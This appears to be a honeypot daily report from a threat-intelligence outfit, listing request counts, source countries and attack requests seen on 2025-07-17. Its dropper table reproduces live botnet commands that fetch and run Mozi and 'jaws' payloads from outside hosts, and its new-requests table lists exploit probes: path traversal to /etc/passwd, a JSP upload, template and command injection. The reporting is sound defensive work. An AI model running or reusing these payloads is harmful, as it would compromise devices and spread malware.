Skip to main content
  1. Daily-Posts/

Report: 2025-07-17

·463 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-17
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 12 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 26 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1004 requests were recorded during the day, originating from 12 different countries, with a peak of 216 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
SGGermany
DEGermany

botnet_dropper_behaviour
#

remote_addrrequest
45.135.194.11GET /shell?%28wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.jaws.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.jaws.sh%7C%7Ccurl%20http%3A%2F%2F38.59.219.27%2Frondo.jaws.sh%29%7Csh%3B HTTP/1.1
117.72.211.135GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
125.71.237.92GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
221.204.61.170GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
180.244.112.233GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://180.244.112.233:58214/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
8.219.236.45GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.211.199.38GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.222.196.142GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.219.136.190GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
120.39.222.178GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
183.252.52.229GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
59.89.7.20227;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
892\x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\xCE\x9A\xF7\x7F\x00\x00\x00\xF5\xCAj\x83\x00\x00\x00\xE0\x81\xF3\x9A\xF7\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01
1472GET /articles/ HTTP/1.1
1492PATCH /mgmt/tm/auth/user/ndEGX HTTP/1.1
1661GET /vpn-forbidden%22;%20%7D%20else%20%7B%20window.location.href%20=%20 HTTP/1.1
1671GET /ppp_user_X116.asp HTTP/1.1
2171POST /MagicInfo/servlet/SWUpdateFileUploader?fileName=./../../../../../../server/R0jdE9.jsp&deviceType=abc&deviceModelName=test&swVer=123 HTTP/1.1
2181GET /MagicInfo/R0jdE9.jsp?input=Mnp6dlBCc3AwMVZaaWwxU1J6M21ES0lrN0N6 HTTP/1.1
2391GET /../../../../../etc/passwd%00 HTTP/1.1
2621\x00\x0E\x08\x93L#\xC1\xDC\x95G\x97\x00\x00\x00\x00\x00
2631\x00\x0E8\x93L#\xC1\xDC\x95G\x97\x00\x00\x00\x00\x00
2671GET /bZ5E9rPDSh.php HTTP/1.1
2831POST /goform/set_hidessid_cfg HTTP/1.1
2851POST /loginok.html HTTP/1.1
2861GET /webui/ HTTP/1.1
2871GET /dir.html HTTP/1.1
2881POST /services/messagebroker/streamingamf HTTP/1.1
2911POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
2921POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties HTTP/1.1
3031POST /p/u/doAuthentication.do HTTP/1.0
3041GET /docs/1.0/?{{phpinfo()}} HTTP/1.1
3051POST /php/dal.php HTTP/1.1
3071GET /locales/locale.json?locale=..%2F..%2Fconfig&namespace=app HTTP/1.1
3141GET /webui/application/get_saml_request?saml_id=1%26$(id
3241GET /xxxxx HTTP/1.1
3441\x00\x0E\x08\xD5\x9Ff\xDC&\xF2?\xB8\x00\x00\x00\x00\x00
3451\x00\x0E8\xD5\x9Ff\xDC&\xF2?\xB8\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0216US
1141GB
284PL
381NL
461IR
554HK
647CH
745SO
837MC
934BG
1033CA
1125VN
1221DE
1313CN
1411SA
1510RU
168SG
178TR
186UA
196IL
205ZA
215BE
225PT
235MU
244FR
254AU
263JP
273IN
283MA
293KZ
303SC
312BR
322ID
332AM
342MD
352ES
362KR
372IE
381PA
391GE
401SY
411TW
421AR
431RO

Related

Report: 2025-07-16
·389 words
Repport Daily
Report: 2025-07-15
·597 words
Repport Daily
Report: 2025-07-14
·448 words
Repport Daily